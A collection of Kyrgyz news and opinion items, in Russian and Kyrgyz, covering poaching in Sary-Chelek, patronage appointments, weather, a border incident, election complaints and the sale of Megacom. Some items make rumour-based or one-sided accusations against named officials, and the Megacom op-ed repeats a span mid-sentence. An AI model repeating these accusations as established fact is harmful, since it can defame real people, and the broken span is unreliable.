В 2014 году 9 мая, когда вся страна праздновала День Победы, двое сельчан, пользуясь тем, что все чествуют ветеранов, в Сары-Челекском заповеднике убили одного медведя, пару козерогов и наловили рыбы в озере. Вот так своеобразно граждане отметили великий праздник.

К их несчастью, на пути им встретились местные активисты и внештатный сотрудник Госагентства, которые осматривали заповедник, не оставили ли отдыхающие непотушенные костры.При виде проверяющих один браконьер сбежал, второго удалось задержать.

Как рассказал Нурболот Таштанов, который с местными активистами и задержал браконьера, нарушителя привели в контору. Но тут появились уже штатные сотрудники заповедника во главе с неким Рахманкулом Шабдановым и, поблагодарив своих коллег за работу, попросили их идти отдыхать, мол, остальное – дело наше.

Нурболот Таштанов, зная случаи, когда к задержанным ранее браконьерам штатные сотрудники проявляли ничем не обоснованную «гуманность» и частенько прощали им грехи, отказался подчиниться. И дело чуть не дошло до драки.

Видя, что один в поле не воин, Нурболот позвонил в Бишкек и вышел на главу Госагентства Сабира Атаджанова. Бюрократическая машина сработала оперативно: по распоряжению начальства из Джалал-Абада прибыли сотрудники Департамента рационального использования природных ресурсов (бывший Департамент охоты), милиция, составили протокол, а задержанного посадили в ИВС. Справедливость почти восторжествовала.

Почему почти? Дело в том, что браконьера осудили на два года условно и обязали выплатить штраф в 920 тысяч сомов. Сумму в 100 тысяч сомов за убийство медведя он уже выплатил. Осталось еще 820 тысяч.

Взять их нарушителю, судя по всему, неоткуда. Самую большую его ценность – старый дом – выставили на аукцион. Но его уже два года никто не хочет покупать. И захочет ли кто-либо купить это жилье в селе, неизвестно. Но, как говорит Нурболот Таштанов, ущерб при желании можно возместить, не дожидаясь продажи дома. Оказывается, когда они привезли задержанного охотника-нелегала в контору, ему на телефон позвонил его сообщник и просил не выдавать его.

По мнению активистов, предполагаемый сообщник являлся ни кем иным, как сотрудником лесхоза Кара-Суу. Разговор подозреваемого в браконьерстве сельчанина и его сообщника был записан даже на видеопленку. А после того, как разговор завершился, на дисплее мобильного телефона высветилось имя Ыманкул. Но почему-то правоохранительные органы этот факт во внимание не приняли.

Есть и еще одно наводящее на размышления обстоятельство. Как рассказал Нурболот, лесников, с которыми у него возник конфликт, когда они привели взятого с поличным нарушителя, вначале уволили с работы. Но директор заповедника Сары-Челек Эсеналы Ормоналиев по непонятным причинам их снова принял на работу, говорят активисты.

Сам директор заповедника объяснил это так: он действительно уволил Рахманкула Шабданова, но тот восстановился через суд. Других сотрудников он просто понизил в должности либо уволил. В том числе уволил и предполагаемого сообщника осужденного браконьера по имени «Ыманкул».

На этом проблемы одного из самых живописных заповедников Кыргызстана не заканчиваются. Как рассказал местный активист из села Кызыл-Туу Аксыйского района Данияр Малабаев, у сельчан увеличилось поголовье домашнего скота, которое в союзное время ограничивали, чтобы сохранять заповедник. Увеличилось и количество мест отдыха, а это значит, что кроме дохода в казну увеличился и объем  мусора, который никто не утилизирует.

«Некоторые сельчане выбрасывают мусор в лес, а с недавних пор появилась еще одна проблема – бассейн, использованную воду из которого хозяин выливает в реку Тоскол-Ата», – говорит активист.

По словам Данияра Малабаева, соорудил этот бассейн в местности Капчыгай один бизнесмен. Резервуар, способный вместить одновременно до 20 человек, расположен прямо на берегу реки, из которой берут питьевую воду жители нижерасположенных сел Жылгын, Кызыл-Туу, Жаны-Жол, Сарымсак-Булун, Кара-Жигач.

«Сейчас все озабочены поступлением чистой воды, мы опасаемся, что в результате работы бассейна в реку попадет загрязненная вода, и это вызовет различные заболевания. Река уже приносит всякий мусор, среди которого находили даже предметы личной гигиены и…», – негодует Данияр Малабаев.

Как рассказал главный врач Аксыйского районного центра профилактики заболеваний и Государственного санитарно-эпидемиологического надзора Жолдошбек Абсаматов, еще в прошлом году они выдали санитарное предписание о запрете эксплуатации бассейна.

«Владелец не выливает использованную воду в реку, но бассейн расположен очень близко к водной артерии, и она все равно попадает в реку, поэтому мы запретили», – говорит главврач.

Как утверждает владелец купального сооружения Раиш Арстанбеков, отработанную воду он выливает в специально построенные очистные сооружения.

«Даже если вода через грунт попадает в реку, она же отфильтровывается, и кто видел, что она попадает непосредственно в воду?» – приводит свои доводы предприниматель.

По его словам, жители сел подали в суд, чтобы запретить эксплуатацию бассейна, и сейчас он ждет решения Фемиды.

За красивыми телевизионными роликами об озере Сары-Челек, на фоне завораживающих видов которого любят сниматься звезды отечественной эстрады, скрыта обыденная жизнь провинции – со своими интригами, противостояниями, спорами, нерешенными бытовыми проблемами.

Думается, не было бы убитого медведя, если бы егерям платили приличную зарплату и был бы жесткий отбор на эту непростую должность… И люди не настаивали бы на закрытии бассейна, если бы в свое время был решен вопрос водоснабжения сел, жители которых и в ХХI веке продолжают пить воду из реки. Пожинаем плоды…

Источник: 24.kg

«За все тебя благодарю я…» Какие должности занимают сегодня бывшие телохранители президента

Хорошо быть телохранителем главы государства. Эту аксиому на прошлой неделе в очередной раз подтвердил Алмазбек Атамбаев, назначив своего бывшего бодигарта Улана Исраилова главой Антикоррупционной службы ГКНБ. Другим президентским «телакам», как известно, повезло не меньше, а то и гораздо больше. Совершенно ясно, что Алмазбек Шаршенович занят обеспечением собственной безопасности, поэтому назначает на ключевые посты самых верных людей. К сожалению, в жертву приносятся такие составляющие, как опыт работы и профессионализм. И в этом свете слова президента о том, что его задача — «подготовить новое поколение кыргызстанцев, избавить страну от воров и коррупционеров, сколотивших миллионы на государственной службе», звучат как откровенная насмешка над согражданами.

Атамбаев и его телохранители

Имя Улана Исраилова впервые «выстрелило» в публичном пространстве в марте 2013 года, когда СМИ сообщили, что бывший телохранитель президента стал начальником Свердловского РУВД столицы. Сотрудники управления пытались воспротивиться назначению человека, который ни дня не работал на руководящих должностях в правоохранительной системе, а замминистра внутренних дел генерал Турганбаев выступил с разъяснениями: дескать, Улан Исраилов в свое время окончил высшую милицейскую школу в Омске (как, кстати, и Феликс Кулов), поэтому налицо профессиональное кадровое назначение.

Улан Исраилов

Напомню, что начальником районного УВД Исраилов был назначен после скандала, связанного с задержанием оперативниками АКС сотрудников этого управления, подозреваемых в вымогательстве взятки. Ранее Улан Джумабекович работал в Службе государственной охраны.

Милицейским руководителем он просидел больше полутора лет — до декабря 2014 года, когда его перевели начальником в оперативно-сыскной отдел КГНБ.

* * *

Безусловно, самым известным и, можно сказать, влиятельным телохранителем (а заодно и водителем) Атамбаева был и остается Икрамжан Илмиянов. В 2010 году Алмазбек Шаршенович (тогда еще премьер-министр) официально оформил его своим помощником. Ныне Илмиянов занимает пост советника главы государства и, по слухам, курирует кадровые вопросы в президентской, правительственной и других обоймах государственного управления.

Икрамжан Илмиянов слева

Его профессиональная биография долгое время оставалась неизвестной. На официальном веб-портале Атамбаева об Илмиянове, в ту пору занимавшем пост первого замруководителя аппарата президента, не было абсолютно ничего. И только когда народ стал шушукаться, что в администрации главы республики сидит человек, имеющий в качестве «профессионального» документа лишь водительские права, появилось несколько строчек: «Образование высшее. Окончил Кыргызский государственный университет имени И. Арабаева по специальности «экономист».

Алмазбек Атамбаев высоко ценит потенциал своего бывшего водителя. Когда дотошные журналисты задали президенту вопрос об Илмиянове, он, ничуть не смущаясь, сравнил того с бывшим председателем Совмина КиргССР: мол, Султан Ибраимов тоже начинал простым трактористом. Алмазбек Шаршенович не учел одно обстоятельство: Ибраимов прошел все ступени карьерной лестницы и имел огромный опыт кадровой работы, чего нельзя сказать об Илмиянове.

Пресса много раз утверждала, что Икрамжан Саттарович — самый влиятельный человек в окружении Атамбаева, а значит, и в стране. Хотя ни для кого не секрет, что в акаевские времена Илмиянов проходил по уголовному делу об убийстве полковника милиции Чыныбека Алиева: по данным следствия, он помогал прятать машину, из которой стреляли в Алиева, другому атамбаевского телохранителю, Эркину Мамбеталиеву. В качестве подозреваемого Илмиянов некоторое время просидел в СИЗО–1, а потом перешел в разряд свидетелей. Уже не первый год его фамилия наводит страх на оппонентов власти, но, похоже, от этого сила Икрамжана Саттаровича только укрепляется.

* * *

Упомянутого выше Эркина Мамбеталиева можно считать вторым по влиятельности человеком из атамбаевского окружения. Экс-майор СГО когда-то был приговорен к пожизненному заключению за серию убийств, совершенных в первой половине 2000-х годов; арестовали его в 2004-м.

После мартовского госпереворота и бегства президента Акаева судьбой Мамбеталиева озаботился Алмазбек Шаршенович. Возможно, Эркин так и разгуливал бы на свободе, если бы не испортились отношения между Бакиевым и Атамбаевым. В 2008 году суд признал его членом банды Рыспека Акматбаева и отправил за решетку до конца жизни.

Эркин Мамбеталиев

Спас Мамбеталиева очередной дворцовый переворот, в результате которого Атамбаев опять оказался на коне. Дело бывшего телохранителя пересмотрели по никому не известным «вновь открывшимся обстоятельствам», после чего он вышел на свободу.

* * *

Завершает наш список Болот Суюнбаев, возглавляющий сегодня Службу госохраны (9-е управление ГНКБ), которой прежде руководил приснопамятный Жаныш Бакиев. В кресло главы СГО Суюнбаев сел в мае 2015 года, он имеет статус заместителя председателя ГКНБ.

По сообщениям масс-медиа, кроме того, что Суюнбаев был личным телохранителем Алмазбека Атамбаева, он является доверенным человеком главы государства и может, помимо прочего, организовать встречу конкретных посетителей с президентом. Также он состоит в приятельских отношениях с главой ГКНБ Абдилем Сегизбаевым и советником президента Икрамжаном Илмияновым.

Это далеко не полный перечень людей, которые заняли высокие должности благодаря своей близости к первому лицу. Перечислять их можно долго, но вряд ли это что-то изменит. Какие уж тут позитивные сдвиги, если во власти — сплошная круговая порука! Конечно, справедливости ради надо отметить, что и оппозиционеры недалеко ушли от иных чиновников в своем умственном развитии. У каждого из них есть собственные скелеты в шкафу, и дерутся они отнюдь не за то, чтобы улучшить жизнь простых кыргызстанцев, а за то, чтобы понадежнее пристроиться к государственной кормушке.

Улугбек Бабакулов 

Источник: mk.kg

Штормовое предупреждение!!!

19-20 марта ночью в зоне земледелия Ошской, Жалал-Абадской, Баткенской, Чуйской и Таласской областей ожидаются заморозки 0…-2°. Заморозки такой интенсивности опасны для набухших почек, бутонов и цветков плодовых косточковых деревьев.

В период с 18 по 21 марта 2016г. в связи с выпавшими и ожидаемыми осадками в горных районах и на автодорогах Бишкек-Ош (121-137, 198-265 км), Бишкек-Талас (198-209 км), Ала-Бука-Канышкыя (62-100 км) и Каракол-Энилчек (45-90 км) сохраняется сход снежных лавин и снежные заносы, снежный накат и гололедные явления.

На автодорогах при проезде лавиноопасных участков необходимо строго соблюдать дистанцию 500 метров между транспортными средствами.

Прогноз погоды

В городе Бишкек 19 марта ночью и утром дождь, снег, днем без осадков. Ветер западный 4-9 метров в секуду. Ночью заморозки 0…-1°, максимальная температура воздуха днем 6…8°.

В городе Ош 19 марта ночью дождь, днем без осадков. Ветер западный 4-9 метров в секуду.Минимальная температура воздуха ночью 1…3°, максимальная температура воздуха днем 10…12°.

19 марта ночью на большей части территории, днем в отдельных районах дождь, снег, в предгорных и горных районах снег. В Иссык-Кульской, Нарынской областях осадки ожидаются на большей части территории. На горных участках дорог снежный накат, гололедица. Ветер западный от 4-9 метров в секуду, по акватории озера Иссык-Куль 15-20 метров в секуду.

20 марта в отдельных районах Иссык-Кульской, Нарынской областей снег, по остальной территории без осадков.

21 марта без осадков. На горных участках дорог снежный накат, гололедица.  Ветер западный 4-9 метров в секуду, 20 марта по акватории озера Иссык-Куль 15-20 метров в секуду.

22-23 марта без осадков.

Повышение температуры воздуха.

Токон Мамытов, КР Чек ара кызматынын экс-төрагасы: “Өзбекстан кечээ басып алган Аксыдагы жер 1938-жылдагы документтерде деле Кыргызстандыкы деп көрсөтүлгөн”

“Кечээ, 18-мартта эрте мененки саат 7.40. да Өзбекстандын аскерлери кирип бууп салган Аксы районуна караштуу Кашка-Суу айыл округунун Сары-Булак участкасы дайыма эле Кыргызстанга карап келген”, – деп билдирди КР Чек ара кызматынын экс-төрагасы Токон Мамытов журналисттерге.
“Бул участок 1938-жылы Кыргыз ССРинин Караван районунун “Бирлик” айыл чарба артелине караган. Ал эми 1951-жылдан тартып бул участок “Бирлик” айыл чарба артелинин базасында түзүлгөн ошол эле Караван районунун “Ленин жолу” айыл чарба артелине карап калган. 1960-жылдан тартып бул участок Караван районунун базасында түзүлгөн Жаңы-Жол районунун (азыркы Аксы району) Ленин атындагы колхозуна бекитилип берилген. Бул участоктун аянты 50 гектарды түзөт. Ал жерден Ала-Бука – Кербен жолунун 1,8 чакырымы өтөт. Асфальтталган жолдон башка ал участкадан 350 метрдей Кыргызстандын электр өткөргүч линиялары да өтөт. Азыр бул участка Аксы районунун Кашка-Суу айыл округунун балансында турат. Бул жерде башынан эле кыргыз жарандары жашап жана дыйканчылык кылып иштетип келишкендиктен биз ал территорияны биздики деп эсептейбиз. Албетте ага жакын жерде Кыргызстан менен Өзбекстандын чек аратилкеси өтөт жана ал тилке боюнча алигиче өз ара макулдашууга кол коюла элек. Ошондуктан ал участкага Өзбекстандын куралдуу күчтөрүнүн кирип келиши көп суроолорду жаратат. Өзбек тарап ал территорияга эмнеге негиздеп аскер техникасын киргизгенин түшүндүрүп бериши керек. Мыйзам боюнча алар ал биздин территориядагы ар бир кыймылын Кыргызстандын Чек ара кызматы менен макулдашып гана жасаш керек болчу. Кыргыз Республикасынын Тышкы иштер министрлиги менен Чек ара кызматы өзбек тараптан расмий түшүндүрмө берүүнү талап кылышы зарыл”, – деди генерал Токон Мамытов.
Эсиңиздерге сала кетсек, кечээ 18-мартта Өзбекстандын куралдуу күчтөрү Аксы районунун Сары-Булак участкасына 40-45 аскер, 2 бронетранспортер жана 2 КАМАЗ маркасындагы автомашинаны киргизип, Аксы –Ала-Бука жолун бууп салышкан.

Эрнис Кыязов, журналист: “КимЧенЫновичтерге” суроо...

..бул сүрөттүн оң тарабында – Кыргызстан менен Өзбекстандын тикен зым менен тартылган чек ара тилкеси, сол тарабында – Бельгия менен Нидерландынын чек арасы…

сурот эрнис

Эмнени айтайын деп жатам? Каримов бул – бардык Өзбекстандын эли эмес, Путин бул – бардык Орусиянын калкы эмес, Назарбаев деп бардык казактарды түшүнбөө керек, Атамбаев бул – жалпы кыргыз эли эмес. Мамлекет башчылардын жеке жөндөмсүздүктөрү, ички, тышкы саясаттагы керт башын көздөгөн авторитардык, хандык, кландык амбициялары өлкөлөр аралык касташуу катары каралбашы керек эле… Тигине Европада 25 өлкө (!!!) Шенген келишимин түзүп, бир мунасага келип алышкан экен, ошол мамлекеттердин эли бир бирине ээн-эркин, шатыра-шатман каттап жүрө беришет. Аларда чек арада оройлонгон чек арачылар, курсагы чытыраган бажычылар, түрмөдөгүдөй кылып темир торлор менен тоскон тосмолор, тикенектүү зымдар, бийик бетондор, аңырайта казылган чуңкурлар жок…

Береги сүрөттөгү Бельгия менен Нидерландынын ортосундагы чек араны чек ара деп болобу, ал тек гана жылуу формалдуулук экени, бир өлкө менен экинчи өлкөнүн ортосунда сөзсүз президенттик же өкмөттүк жолугушууларда эле “түбөлүк достук туурасындагы меморандумдарга” кол коюп кофе ичишип калбай, мобу сүрөттөгүдөй.. бир кадам ары аттасаң аркы мамлекеттин, бир кадам бери аттасаң берки өлкөнүн аймагында жүрө берчү адамгерчиликтүү, кадыресе, жөнөкөй мамиле күтсө болоору айгине болуп турбайбы.

Менин эсимде, илгери бала кезимде Карасуу шаарында чон дарыянын ары жагында Өзбекстан, бери жагы Кыргызстан экени тек формалдуулук болоор эле, чоң көпүрөдөн ары жакка өтүп өзбектер даамына чыгарып бышырган шашлык, навай нан, халва, анжир жеп, мажүрүм талдары шуудураган, бытпылдыктары сайраган чайханаларда сөрү-тапчандарга олтуруп алып көк чай ичээр элек. Өзбектер да Кыргызстан тарапка өтүп ээн эркип катташып, күлүшүп, иштешип, туугандашып жүрө беришчү.

Менимче, кыргыздар же өзбектер (ж.б. казактар, тажиктер,түрмөндөр…) “…аттаналы, жата бербей курал алып болсо да мекенибизди коргойлу!” дегенден мурда, дээринде биз бири бирибизге душман эмес экенибизди, өлкөнү, мекенди каптап, басып кирип келе жаткан кандайдыр коркунучтуу “желмогуз” жок экенин түшүнүп, даана желмогуз – эки элдин ынтымагын чыңоого саясий-экономикалык жактан реалдуу аракет кылбаган, өз амбициясынан алыс чыга албай, жеке бийлигин жана анын келечегин гана ойлогон, дипломатиялуулукту “тизелөө, чөгөлөө” деп түшүнгөн Атамбаев, Каримов, Назарбаев, Рахмон сыяктуу президент статусу бар “КимЧенЫновичтерге” чоң суроо узатсак туура болмок…

“Эй падышалар! Өзүңөрдү эле ойлой бербей бизди да ойлойбойсуңарбы!!!?” деген суроону…

Эрнис Кыязов, журналист

«Мамлекеттик тилде иш кагаздарын жана телерадиоберүүлөрдү жүргүзүү» аттуу семинар-тренинг КТРКнын кызматкерлери жана журналисттерине өткөрүлүп жатат.

Кыргыз Республикасынын Президентине караштуу Мамлекеттик тил боюнча улуттук комиссияны алдындагы Окуу-маалымат борбору «Мамлекеттик тилде иш кагаздарын жана телерадиоберүүлөрдү жүргүзүү» аттуу семинар-тренингин Кыргыз Республикасынын Коомдук телерадиоберүү корпорациясынын кызматкерлери жана журналисттерине уюштурду.

Окутуу иштери боюнча маселе КТРКнын башкы директору И.Карыпбеков менен Мамлекеттик тил боюнча улуттук комиссиянын жамаатынын жолугушуусунда комиссиянын төрагасы Э.Эрматов тарабынан сунушталган. Эки тараптуу макулдашуудан соң окууну каалаган кызматкерлерден эки топ түзүлүп, биринчи топ үчүн алгачкы окуу иштери бүгүн 18-мартта башталды.

Эки күндүк семинар-тренингдин жүрүшүндө катышуучулар кыргыз тилинин орфографиялык жана орфоэпиялык эрежелери, иш кагаздарын мамлекеттик тилде жүргүзүү, термин маселелери ж.б. журналистика үчүн олуттуу болгон жагдайлар боюнча маалымат алышууда. Окуу иштери пикир алышуу менен коштолуп, жандуу жана кызыктуу өтүүдө. Ушул эле программа менен журналисттерге арналган семинар-тренингдер улантылмакчы.

Жылдыз Жолдошова, экс-депутат: "Оштун саясый кландары шайлоо боюнча мыйзамды бузуп, СДПКга добуш берүүгө үгүттөп жатышат"

“Биздин “Аалам” партиясы Ош шаардык кеңешке шайлоолорго катышып жаткандыктан мен 28-февралдан бери Ош шаарында жүрөм. Ошто мамлекеттик чоң кызматта иштегендер 4-5 саясый кландарга бөлүнүп алышып, шайлоодо элди бийликтеги СДПК партиясына добуш берүүгө үгүттөшүп, шайлоо боюнча мыйзамдарды бузуп жатышат”, – деп билдирди кечээ, 18-мартта Кyrgyztoday.kg маалымат агенттигине Ош шаарынан “Аалам” партиясынын теңтөрагасы, экс-депутат Жылдыз Жолдошова.
“Бүгүн Ош шаарындагы Фрунзе орто мектебинде шайлоо боюнча чогулуш болуп жатат дешкенинен чогулган элге биз да өз программабызды айтып калалы деп барганбыз. Барсак мектепти жайнаган милиция кызматкерлери курчап алып эч кимди киргизбей жатышыптыр. “Киргенге болбойт, жабык жыйын болуп жатат” деп башкаларды киргизбей артка кайтарып жатышыптыр. Мен аларды укпай, жаңжал салып, жулунуп кирип барсам Фрунзе мектебине жалаң өзбек туугандарыбызды топтоп алышып, Ош облустук милициянын башчысы Сүйүн Өмүрзаков чогулуш өткөрүп, СДПКга добуш берүүгө үгүттөп жатыптыр. Биринчиден, эмне үчүн жайнаган милиция кызматкерлери коомдук тартипти көзөмөлдөп шаарда жүрүүнүн ордуна шефин кайтарып шайлоонун үгүт иштеринде жүрүшөт? Экинчиден, эмне үчүн мамлекеттик кызматкер Сүйүн Өмүрзаков баардык партияларга калыс болуунун ордуна мыйзамды бузуп бийликтин партиясына үгүттөп жүрөт? Үчүнчүдөн, эмне үчүн шайлоого арналган жыйынды жабык эшик артында өткөрүшөт? Төртүнчүдөн, эмне үчүн жыйынга жалаң өзбек туугандарыбызды бөлүп алып бир улуттуу жыйын курушат? Бешинчиден, эмне үчүн аларга милициянын чоңдору визиткаларын таратышып, “бир проблема болсо бизге телефон чалгыла, биз жардам беребиз” деп “крыша” болуп убада кылышып, анан СДПКга добуш берүүгө үндөшөт? Айта берсе мындай мыйзам бузуулардын чеги жок. Мен Сүйүн Өмүрзаковго “эмне үчүн визиткаларыңарды буларга таратасыңар, эгер буларда проблема болсо милициянын чоңдоруна эмес, эл катары “102” кызматына чалыш керек?” десем, “Министр Мелис Турганбаевдин ушундай приказы бар” дейт. Мен Мелис Турганбаевге телефон чалсам, ал телефонун албай койду, ушундай мыйзамсыз приказ барбы тактайын дегемин. Президенттик аппараттын жетекчиси Фарид Ниязовго чалып ушундай мыйзам бузууларды билдирейин десем секретарша кызы алып кошпой койду. Ошондуктан журналисттерге кайрылууга туура келип жатат. Азыр БШКнын төрагасы Туйгуналы Абдраимов Ошко келиптир деп угуп ага баратамын. Мен президент Алмаз Атамбаевди сыйлайм. Кошоматчылары аны жаманатты кылып жатышат. Оштогу дагы бир клан – Матраимовдор кланы өз позициясы бар жаштарды кысымга алып, жалаң “хоп-майли” жаштарды алдыга сүрөп, СДПКга үгүттөп жүрүшөт. Кыскасы Ош шаардык кеңешке шайлоо кампаниясы жалаң одоно мыйзам бузуулар менен өтүп жатат. Кимге арызданарды да билбей калдык,” – деди Жылдыз Жолдошова.
Булак: Кyrgyztoday.kg

Бишкек шаардык кеңешинин жыйынында мамлекеттик тил маселелери талкууланды

Мамлекеттик тил боюнча улуттук комиссиянын төрагасынын орун басары Медербек Аким уулу, бөлүм башчылар Аалы Молдоканов жана Аида Ишеналиева Бишкек шаардык кеңешинин мамлекеттик тил маселесине арналган жыйынына катышты.

Аталган жыйында Бишкек шаарынын мэри А.Ибраимов баштаган баштаган мэриянын өкүлдөрү мамлекеттик тил боюнча аткарылып жаткан иштер боюнча билдирме жасашып, ошондой эле, мамлекеттик тил жаатындагы көйгөйлөр талкууланды. Жыйындын жүрүшүндө туура эмес жазылган жана бурмаланып айтылган көчө аттарына басым жасалды. Мамлекеттик тил боюнча улуттук комиссиянын котормо бөлүмүнүн башчысы А.Молдоканов: “Ахунбаева, Токомбаева деп көчөлөргө ысымдары берилген бардык эркек адамдарды аялдарга айландырып салдык. Бишкекте аял кишинин атынан коюлган бар болгону Б.Бейшеналиева жана У.Салиева деген эки көчө бар,”-деди өз сөзүндө.

Бийликтеги «Бөө» менен «Дөө» чабышып баштады

Президенттин жандай көргөн кеңешчиси Ик­рам Илмиянов менен Премьер министр Темир Сариевдин тиреши күч алыптыр. Өкмөткө киреше берчү структуралардын баарысына башын салып көнүп калган Икрам «долядан» кур калып жатса керек.
Тигил Сариевиң болсо Шоопурга алдырып ийип эле отуруп калчудай «лох» эмес да. Айрыкча бажы тармагы бул экөөнүн талашына айланып, чырдын аягы Сариевдин отставкасы менен бүтчүдөй. Ошентип, бийликтеги «Бөө» менен «Дөөнүн» чабышы мамлекеттин өнүгүшүнө залакасын тийгизип жатат. Кыргыз байкуштун шору шорподой кайнады го.
Булак: “Ачык саясат”

Мегаком чыры: Азат өзүн «Ата Мекен» партиясынан Мегаком­го «смотрящий» катары тааныштырып... асфальттын астында кала турган акча...

Көп адамдар Мегакомдун сатылуусу жөнүндө менин оюмду сурашат. Акыркы 4 жыл абакта отургандыктан, менде кеңири, ар тараптуу маалымат жок. Ошондуктан, менин пикирим жеке тажрыйбама, билимиме, массалык маалымат каражаттарына чыккан ачык маалыматка жана өзүм күбө болгон окуяларга таянат.
Мегакомдун сатылышын бийлик «иш начар, азыр сатпасак кийин таптакыр наркы чыкпай калат, мамлекет ишкананы башкара албайт жана мамлекеттик сатып алуулар жөнүндө мыйзам Мегакомдун иштөөсүнө  тоскоолдук кылууда» деп негиздөөдө. Талдап көрөлү.
Азат Базаркулов Мегакомдун бүгүнкү жетекчиси, телеком­муникация тармагында адис эмес, экономика же бизнес тармагында жетишкендиктери менен мурда байкалган эмес. Бирок, эмнегедир 2010-жылы ал Мегакомго сырттан башкаруучу болуп дайындалат. Сырттан башкаруучу деген эмне? Убактылуу өкмөттүн  декрети­не ылайык, улутташтырылган ишканаларда мамлекеттин кызыкчылыгын көзөмөлдөө үчүн сырттан башкаруучулар дайындалат. Алардын (сырттан башкаруучунун) колу коюлмайын, бир дагы документ мый­зам күчүнө кирбейт. Башкача айтканда, директор ким болбосун, сырттан башкаруучунун макулдугу жок бир дагы келишим же бир дагы акча которуу ишке ашырылбайт. Сырттан башкаруучу ишканага толук көзөмөл кылынат.
2012-жылы Азамат Мурзалиев камакка алынгандан ки­йин Азат Базаркулов Мега­комго башкы директор болуп дайындалат да, сырттан баш­каруучу кызматын жоюп са­лат. Мына бир канча жылдан бери бийлик Мегакомдун иши жылдан-жылга начарлап баратканын айтып келет. Бирок, дареметсиз жетекчи А.Базаркуловду иштен алуу оюна да келбейт. Бул эмнеликтен? Эми карагылачы, мыйзам боюнча мамалекеттик мүлктү башкаруу фонду (ММБФ) ачык конкурс өткөрүп, кадрлар резервин түзүш керек. Конкурс өткөрүлөт. Өздөрүн жакшы көрсөткөн  кесипкей талапкерлер мамлекет­тик ишканаларга жетекчи бо­луп дайындалат. Бул иш ачык- айкын жүргүзүлөт. Бирок, Мегакомдон башкаларда. ММБФ Мегаком боюнча дайыма көмүскө иш алып барат. Жалпы эрежеден сырткары өзгөчө мамиленин сыры эмнеде?
Жарыяланган статистикага ылайык, Билайнга салыштырмалуу Мегакомдун дүң кирешеси көбүрөөк  болгону ме­нен таза кирешеси аз. Логика боюнча, сатуулар канчалык көп болсо, пайда да ошончолук көп болуш керек. Мегакомдо тескерисинче. Бирок, ММБФти мындай нерсе тынчсыздандырбайт. Мыйзамга ылайык, мын­дай учурларда ММБФ эсептөө палатасына кайрылып, эффективдүүлүк аудитин өткөрүшү керек. Ошондой текшерүүдөн эмне үчүн чыгашалар көбөйүп кеткендиги аныкталмак. Бирок, ММБФ мындай текшерүүгө  демилгечи болбой эле. Эмнеликтен? Азат Базаркулов менен биринчи жолу таанышканым эсимде. 2010-жылдын дүрбөлөңдүү айлары. Тааныштар адис катары уюлдук байланыш боюнча кеңеш сурашты. Ошондо Азат өзүн «Ата Мекен» партиясынан Мегаком­го «смотрящий» катары тааныштырып, уюлдук байланыш кантип иштээрин түшүндурүп берүүмдү  суранды. Бул татаал нерсе, анын негизин түшүнүү үчүн 5 жыл окуш керектигин айттым. Болбоду. Ошондо бир баракка жалпы топологияны тарта баштадым. MSG, BSC,
BTS, интерконнект, биллинг… Албетте, 15 мүнөттүк  экспресс сабактан эч майнап чыкпайт. Ошондо Азат бир гана суроо берди: «Мегакомдо акча кайда?» деп. Эми мен Мегакомдун ишин ичинен билбейм, андыктан, акча кайда экенин айта албайм. Ошону менен сөз бүттү.
«Ата мекен» партиясынын реакциясын утурлап: Мен өз кулагым менен укканыма гана күбөмүн. Олег Панкратовдун айтуусу боюнча мамлекеттик сатып алуулар боюнча мыйзам Ме­гакомдун иштөөсүнө тоскоол­дук кылат имиш. Ошондуктан, «Мегакомду сатуу керек» дейт. Менде мындай суроо туулат: Эмнеликтен ал мыйзам Мега­комдун гана ишине тоскоол­дук кылат? Башка ишкана­ларга тоскоолдук кылбайбы? А эгер мыйзам начар болсо, анда экономика министрлиги ошол мыйзамга өзгөртүү киргизүү демилгесин көтөрсө, ан­да түшүнүктүү болот эле. «Ии, мына, бизнес чөйрөсүндө  кызматты жакшыртуу аракетин көрүп жатат» демекпиз. Ал эми буларда мыйзам жаман, ошондуктан, Мегакомду сатып керек. Түшүнүксүз. О.Панк­ратовдун ой-түпкүрүндө эмне бар болду экен? Бизде кимдер көп? «Серепчилер» көп. Билсе-билбесе да сереп салып, сыналгыга чыга калат. Ошон­дой «серепчилер» үн трафиги азайды, азыр интернет, ботсап (whatsapp) тараган, уюл­дук операторлорго кыйын бо­лот, ошондуктан, «Мегакомду азыр сатуу негиздүү, бул туура иш» дешет. Эгерде чындап эле ушундай болсо, анда бүт өлкөлөрдөгү уюлдук операторлор сатыкка коюлмак. Андай эч нерсе байкалбайт го? Андан көрө ошол «серепчилер» бүгүнкү жетекчиликте техно­логия, инновация дегенди түшүнгөндөр жок, ошондуктан, алар Мегакомду иштете алышпайт, иштете албаган соң сатууга аргасыз десе туура болмок. Чындыгында эле, бүгүнкү биллинг… Албетте, 15 мүнөттүк экспресс сабактан эч майнап чыкпайт. Ошондо Азат бир гана суроо берди: «Мегакомдо акча кайда?» деп. Эми мен Мегакомдун ишин ичинен билбейм, андыктан, акча кайда экенин айта бийликте гаджетти толук кандуу түшүнүп, колдонгон адамды тапкылачы? Инновация де­ген эмне экенин билбегендер кантип биздин өлкөнү инновациялык өнүгүү жолу менен жетектей алсын? Алтынчы айфон чөнтөгүндө бар болсо эле, «а-а бул техниканы билет экен» деп ойлобогула, көөдөнү жоктугунан алып жүрөт, эл көзүнө кыйын көрүнүү үчүн  Аны алтын саат же шакек сыяктуу эле өзүнүн байлык, мансабын көрсөтүү үчүн алып алган. Кеп технологиянын өзгөрүшүндө эмес, жетекчилердин акыл тайкысында. Мына 2012-жылы бизди камакка алганда, АКСтин ошондогу жетекчиси Бектен Сыдыгалиев сыналгыдан түшпөй калган. «Корруп­ция, коррупция» деп эле бир таблицаларды көрсөтөт, анын маанисин  өзү да билбейт, журналисттери да билбейт, армагедон өзүнчө  эле. Ошондо эл ишенип алган эле. Беш жылга кетти, мен эмес, менден кыйындардын далайына өкүм чыкгы. Илээше турган бир нерсеси болсо, эмдигече кечип жиберишмек эле. Эч нерсе жогунан  жок жөн эле кармап отурушат.
